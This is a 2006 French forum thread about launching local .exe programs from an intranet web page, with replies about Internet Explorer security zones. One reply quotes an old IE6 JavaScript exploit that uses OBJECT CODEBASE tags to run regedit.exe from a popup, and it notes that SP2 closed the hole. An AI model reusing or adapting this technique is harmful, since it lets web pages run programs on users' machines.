Via un page web, exécuter un programme .exe sur mon disque c:

Hello,

On a dans notre société un intranet et on aimerait créer des lignes qui permettraient de lancer les programmes .exe présent sur le disque dur !

une ligne du type : file:///C:/Program%20Files/simens/prm/prm.exe
fonctionne via une page web...
mais si on en fait un lien hypertexte il ne se passe rien...

c'est peut-être réglé automatiquement ainsi par sécurité ?

Voilà si vous avez des infos à ce sujet et un peu de temps pour l'expliquer Merci d'avance

Bonjour et bienvenue cgodfrin,

oui c'est un trou de sécurité qu'une page web puisse exécuter c:\winnt\system32\format.exe (exemple fictif) et toute autre application locale!

Mais il doit y avoir moyen de déclarer l'intranet comme "zone sûre" dans IE (me rappelle plus le terme exact, dans Outils / Options) par exemple.

Felipe
Modifié par Felipe (14 Jul 2006 - 14:53)

IL me semble avoir vu passer une option permettant ceci sur IE dans la personnalisation du niveau de sécurité.

Hello,

Il y a eu tout un temps ou il y avait moyen d'exécuter ce type de JavaScript :

function failleIE6()
{
var opopbody;
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/regedit.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/regedit.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/regedit.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}

Mais ce n'est plus possible car SP2 l'empèche. De plus cela ne fonctionne que sur Win/IE ...
Heureusement d'ailleur que tout cela a été comblé car cela représentait une grave faille de sécurité.

G.